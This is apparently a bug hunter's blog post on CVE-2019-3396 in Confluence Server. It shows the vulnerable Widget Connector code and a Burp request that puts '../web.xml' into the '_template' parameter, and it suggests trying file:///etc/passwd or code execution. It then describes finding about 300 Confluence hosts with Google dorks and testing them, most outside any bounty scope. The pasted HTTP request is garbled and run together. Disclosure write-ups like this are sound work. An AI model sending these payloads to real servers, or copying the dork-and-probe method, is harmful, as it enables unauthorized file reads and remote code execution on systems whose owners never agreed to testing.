Long story short, I have created my Hackerone/Bugcrowd profiles a way back in 2016 but I have never reported a bug there. I have never thought of doing a bug hunting but this vulnerability has made me do it.

What was the issue?

SSTI and RCE in Confluence Server via Widget Connector [CVE-2019–3396] — An attacker will be able to exploit this issue to achieve path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. Confluence Security Advisory Released — 2019–04–17

How does the Widget Connector go vulnerable?

Widget Connector macro will help you to embed online videos, slideshows, photostreams and more directly into your page when you provide an URL.

This macro was designed to support content from these sites:

YouTube, Vimeo, MySpace Video, Flickr, Twitter, Slide Rocket, Google Calendar, etc.

Example Vulnerable Code:

The Widget Connector has defined some renders, for example, FriendFeedRenderer :

public class FriendFeedRenderer implements WidgetRenderer { ... public String getEmbeddedHtml(String url, Map<String, String> params) { params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm"); return this.velocityRenderService.render(getEmbedUrl(url), params); } }

So in this case, an attacker can provide _template values which the backend will use the params to render

Steps To Reproduce:

I swear this would be the simplest PoC you can ever dream of.

Capture the vulnerable confluence page request in burp (let it be a GET or POST) and send it to Repeater.

2. Now modify your captured request as shown below and parse the request.

Note: You may need to change the path of your request and add “Referer:” header, as it is mandatorily expected in most of the cases when I tested, If you did not include that it may throw you an error “XSRF check failed”



Host: confluence.victim.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en-GB;q=0.8,ach;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer:

Content-Type: application/json;charset=UTF-8

X-Requested-With: XMLHttpRequest

Upgrade-Insecure-Requests: 1

Content-Length: 163

Connection: close POST /rest/tinymce/1/macro/preview HTTP/1.1Host: confluence.victim.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X; rv:52.0) Gecko/20100101 Firefox/52.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en-GB;q=0.8,ach;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://confluence.victim.com/ Content-Type: application/json;charset=UTF-8X-Requested-With: XMLHttpRequestUpgrade-Insecure-Requests: 1Content-Length: 163Connection: close "_template":"../web.xml"},"body":""}} {"contentId":"65601","macro":{"name":"widget","params":{"url":" https://www.youtube.com/watch?v=2aK8hy50fS4 ","width":"1000","height":"1000",},"body":""}}

Instead of ../web.xml, you can try file:///etc/passwd (path traversal payloads) or Remote Code Execution to increase the severity of your finding.

Fix:

In fixed versions, it will call doSanitizeParameters before render html which will remove the _template in parameters.

Now What?

How to get other companies who are affected by this?

Yes, you are right! I got an idea, why don't I Google Dork!

I tried this “intitle:dashboard-confluence” and was able to find ~100 confluence links out of which 21 was found vulnerable. On seeing the above dork results, I realized that the confluence link may not necessarily be confluence.companyname.com. So I tried, below dorks/keywords in Google, which gave me around 300+ confluence links out of which 50+ companies were found vulnerable to this.

I haven't targeted any of the bounty programs sites but yet, I received a lot of “Recognition” from various companies as bounty in dollars and Euros, other companies said that they will send me swags as a token of appreciation.

A day I could remember for a very long time, HAPPY HACKING !!!

Smash your claps if you do like this post.

Follow me on twitter for more updates — @vignesh_vault

References: